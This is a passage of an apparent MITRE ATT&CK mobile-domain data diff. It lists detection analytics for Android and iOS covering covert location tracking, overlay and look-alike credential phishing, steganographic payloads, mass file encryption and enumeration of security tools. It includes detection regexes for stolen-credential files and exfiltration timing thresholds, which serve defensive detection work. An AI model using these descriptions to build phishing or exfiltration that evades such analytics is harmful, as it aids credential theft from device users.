+                            "channel": "Application granted/retaining ACCESS_FINE_LOCATION and/or ACCESS_COARSE_LOCATION; background location capability present (ACCESS_BACKGROUND_LOCATION on Android 10+)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "LocationSamplingFrequencyThreshold",
+                            "description": "Defines acceptable rate of location queries before triggering anomaly conditions"
+                        },
+                        {
+                            "field": "BackgroundLocationPolicy",
+                            "description": "Baseline of legitimate background location usage across applications"
+                        },
+                        {
+                            "field": "LocationToNetworkTimeWindow",
+                            "description": "Temporal linkage between location access and outbound traffic"
+                        },
+                        {
+                            "field": "UserInteractionWindow",
+                            "description": "Maximum time since last user interaction before location access becomes suspicious."
+                        },
+                        {
+                            "field": "AllowedLocationApps",
+                            "description": "Allow-list of expected location-heavy apps (maps, rideshare, fleet apps) for the enterprise device population"
+                        },
+                        {
+                            "field": "DevicePolicySensitivity",
+                            "description": "Tuning for how aggressively to treat background location permission as risky depending on org policy."
+                        },
+                        {
+                            "field": "AllowedDestinationsBaseline",
+                            "description": "Baseline of expected domains/IPs for legitimate location services (OEM, mapping SDKs, MDM endpoints) to reduce false positives."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-04 23:46:03.218000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--f34fef81-f714-4e26-ae99-3c970959cd0d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0675#AN1777",
+                            "external_id": "AN1777"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1777",
+                    "description": "Defender correlates an application\u2019s location authorization level (When-In-Use vs Always) and entitlement posture with observed location sensor activity that occurs without proximate user interaction, including background updates, followed by periodic outbound network sessions aligned to location update timing\u2014suggesting covert or policy-violating location tracking.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Application activates CoreLocation services or CLLocationManager APIs"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "App installed with location usage declarations (WhenInUse/Always usage description) and granted authorization level via managed policy state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "ForegroundLocationExpectation",
+                            "description": "Defines legitimate location usage relative to app state"
+                        },
+                        {
+                            "field": "LocationAccessDurationThreshold",
+                            "description": "Baseline deviation tolerance for sustained location tracking"
+                        },
+                        {
+                            "field": "LocationToTransmissionWindow",
+                            "description": "Temporal threshold linking location access to network activity"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-04 23:47:29.735000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--2867d1e0-cf83-4d83-bc6c-cc03404c3521",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0676#AN1778",
+                            "external_id": "AN1778"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1778",
+                    "description": "Defender correlates an app preparing to phish (gaining overlay/notification/accessibility capability) with precise foreground targeting (reading activity in front via accessibility/focus) and then presenting a look-alike UI (overlay window or activity-on-top) immediately before local storage or small-burst egress of entered data. Chain: capability/permission \u2192 target app in foreground detected \u2192 overlay/activity-on-top or fake notification tap \u2192 local prompt input write \u2192 near-term network egress.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Grant/enablement of SYSTEM_ALERT_WINDOW, BIND_ACCESSIBILITY_SERVICE, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "android:logcat",
+                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from overlay/activity to persist/exfil (e.g., 5\u201360s)."
+                        },
+                        {
+                            "field": "OverlayRequired",
+                            "description": "Require overlay evidence unless activity-on-top is observed (true/false)."
+                        },
+                        {
+                            "field": "TargetPkgWatchlist",
+                            "description": "List of high-value target packages (banking, identity) to raise severity."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for local prompt data artifacts."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good analytics/CDN/service domains to suppress FPs."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Work Profile/Kiosk mode/Accessibility allowlist to scope benign cases."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-01-29 19:36:34.664000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--8062d295-9d02-40c5-9ef9-135d08c07a22",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0676#AN1779",
+                            "external_id": "AN1779"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1779",
+                    "description": "Defender correlates a look-alike prompt inside an app (e.g., faux Apple ID password view, webview of brand login) with timing against scene/foreground activation, optional push notification bait, then local form cache writes and/or small egress. Chain: scene activation around sensitive UI \u2192 suspicious prompt creation (UIKit events without expected auth controller) or webview navigated to look-alike domain \u2192 local cache write \u2192 near-term egress",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Scene/foreground transitions for <bundle_id> to contextualize timing"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from prompt to persist/exfil (e.g., 5\u201360s)."
+                        },
+                        {
+                            "field": "LookalikeDomainScore",
+                            "description": "Threshold for domain visual similarity (e.g., \u22650.85)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for credential/form cache artifacts in container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Enterprise/analytics endpoints to suppress FPs"
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "MDM policy, Focus mode, foreground requirement."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-01-29 19:53:20.408000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--cda313bc-214f-4bf8-9aa2-b3fb495379c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0677#AN1780",
+                            "external_id": "AN1780"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1780",
+                    "description": "Defender correlates an app's opaque media ingress (download/IPC) with high-entropy or anomalous edits to image/audio/video files in app-writable storage (e.g., bursts of bitmap/codec operations, EXIF/IPTC/XMP mutation, suspicious container growth), followed by decoding/extraction behavior (new non-media artifact derived from the edited media) and optional exfiltration/sharing of the stego media. Focus is on: (1) opaque media arrival \u2192 (2) rapid metadata or pixel-domain mutations with atypical size/entropy deltas \u2192 (3a) decoded payload creation or dynamic load from decoded path, and/or (3b) upload/share of the modified media within a tight window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "android:logcat",
+                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time between media download/ingress, edit, and payload use/share (e.g., 10\u2013120s depending on device performance)."
+                        },
+                        {
+                            "field": "PayloadEntropyThresholdMediaSegment",
+                            "description": "Minimum Shannon entropy for edited media regions or container deltas (e.g., \u2265 7.1) to flag likely embedded payloads."
+                        },
+                        {
+                            "field": "SizeDeltaRatio",
+                            "description": "Minimum growth ratio between pre/post edit media (e.g., \u2265 1.25) to reduce noise from normal compression."
+                        },
+                        {
+                            "field": "EditBurstWriteCount",
+                            "description": "Minimum sequential small-write count to indicate chunked embedding or re-encode bursts."
+                        },
+                        {
+                            "field": "SuspiciousMimeTransitions",
+                            "description": "List of atypical MIME/container transitions (e.g., PNG\u2192JPEG with EXIF injection, WAV\u2192M4A) for local tuning."
+                        },
+                        {
+                            "field": "KnownGoodMediaAppsAllowlist",
+                            "description": "Trusted editors/camera apps allowed to perform frequent edits without alerting."
+                        },
+                        {
+                            "field": "NetworkCDNAllowlist",
+                            "description": "CDNs/domains expected to host user media for the enterprise; suppresses FP for legitimate apps."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground, Work Profile, developer mode flags used to scope analytics."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-01-22 19:50:50.601000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c37bba44-9ca2-4444-8ee9-7cab0b2fd5fd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0678#AN1781",
+                            "external_id": "AN1781"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1781",
+                    "description": "An application with access to broad file scopes or sensitive storage areas becomes active, performs abnormal burst file reads and writes across many user or shared-storage locations, transforms file content or extensions at scale in a short window, and causes rapid file inaccessibility, rewrite, or replacement inconsistent with normal sync, backup, media processing, or document-editing behavior. The defender correlates capability state, app lifecycle, framework use, bulk file-write effects, and optional network communications to distinguish encrypt-for-impact behavior from benign bulk file operations.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "android:MDMLog",
+                            "channel": "Managed storage, backup, enterprise file access, or device policy state remains unchanged while bulk destructive file transformation occurs"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application holds or is granted broad storage, document-provider, media, or file-management capability inconsistent with its expected role before or during bulk file transformation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application runs in foreground, service, or sustained background-active state while concentrated file transformation occurs with weak or no recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum correlation span between app activation, framework use, and burst file transformation."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved apps allowed to perform legitimate broad file operations such as backup, sync, AV scanning, enterprise migration, media editing, or document management."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether a benign bulk file operation is expected to occur only while the app is visible and actively used."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Threshold for determining whether large-scale file transformation was user-driven versus unattended."
+                        },
+                        {
+                            "field": "FileWriteBurstThreshold",
+                            "description": "Threshold for number of file create, overwrite, rename, or replace actions within the correlation window."
+                        },
+                        {
+                            "field": "DistinctDirectoryThreshold",
+                            "description": "Threshold for number of distinct folders or content roots touched during the file-impact burst."
+                        },
+                        {
+                            "field": "ExtensionChangeThreshold",
+                            "description": "Threshold for suspicious file extension changes or replacement-file patterns indicative of mass transformation."
+                        },
+                        {
+                            "field": "BytesWrittenThreshold",
+                            "description": "Threshold for cumulative bytes written during the impact window."
+                        },
+                        {
+                            "field": "ProtectedPathAllowList",
+                            "description": "Known paths, document roots, or work-profile storage locations where benign enterprise migration or sync tooling may rewrite many files."
+                        },
+                        {
+                            "field": "DestinationAllowList",
+                            "description": "Expected network destinations contacted by legitimate storage, sync, backup, or MDM remediation apps."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-12 17:25:00.733000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e0ee0af8-96f8-4baf-b0f2-63d4b49938f2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0679#AN1782",
+                            "external_id": "AN1782"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1782",
+                    "description": "OLD: Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application\u2019s manifest, or `NSContactsUsageDescription` in an iOS application\u2019s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.\nOn both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. \n\nNEW: A defender observes an Android application requesting for android.permission.READ_CONTACTS, which may also be listed in the application's manifest file. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_CONTACTS permission."
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-03-23 20:22:40.361000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--87d2ccc4-f82e-493d-9c6f-03303253aec2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0680#AN1784",
+                            "external_id": "AN1784"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1784",
+                    "description": "Defender observes an app enumerating installed security/management controls (AV/EDR/MDM/VPN/Play Protect) via PackageManager, DevicePolicyManager, AppOps, and Settings queries or shell \u2018pm list\u2019 usage, optionally probing Accessibility/Device Admin state. Enumeration is followed by local inventory artifact creation and/or small egress. Chain: capability to query \u2192 burst of security-focused checks (packages/permissions/policies) \u2192 optional foreground targeting \u2192 artifact write \u2192 quick POST.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
+                            "name": "android:logcat",
+                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Reads/queries ops for PACKAGE_USAGE_STATS, QUERY_ALL_PACKAGES, BIND_DEVICE_ADMIN, BIND_VPN_SERVICE"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from discovery burst to persist/exfil (e.g., 10\u2013120s)."
+                        },
+                        {
+                            "field": "MinEnumCount",
+                            "description": "Minimum API calls/rows indicating inventory (e.g., \u226530 in 10s)."
+                        },
+                        {
+                            "field": "SecurityTargetsList",
+                            "description": "Regex/prefix list of AV/EDR/MDM/VPN packages & services to elevate severity."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for local inventory artifacts (DB/JSON/TXT) in app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Allowlisted analytics/endpoints to suppress FPs."
+                        },
+                        {
+                            "field": "WorkProfileOnly",
+                            "description": "Scope to Work Profile events to reduce personal-profile noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-02-02 16:07:33.370000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9c721bd4-75df-4381-bd70-29679aa78a4b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0680#AN1785",
+                            "external_id": "AN1785"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1785",
+                    "description": "Defender correlates app attempts to enumerate or infer security/management tooling (ManagedConfiguration/MDM presence, VPN/NEFilter config, AV/EDR app presence via LaunchServices or URL-scheme probing, private APIs) with local inventory persistence and egress. Chain: probe (MDM/NE/VPN/AV presence) \u2192 burst of LS/canOpenURL/ManagedConfiguration calls \u2192 inventory cache write \u2192 small POST.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from probe burst to persist/exfil (e.g., 10\u2013120s)."
+                        },
+                        {
+                            "field": "MinProbeCount",
+                            "description": "Minimum API/probe count to flag (e.g., \u226525/10s)."
+                        },
+                        {
+                            "field": "SecurityTargetsList",
+                            "description": "Schemes/bundle IDs for AV/EDR/MDM/VPN vendors (regex/prefix)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for inventory artifacts in app/extension containers."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good analytics/CDN allowlist."
+                        },
+                        {
+                            "field": "JailbreakContext",
+                            "description": "Escalate severity if private APIs used on non-managed devices."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-02-02 16:21:09.206000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--36cb5f92-996c-42f4-be7e-43c5e21eee2e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0682#AN1788",
+                            "external_id": "AN1788"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1788",
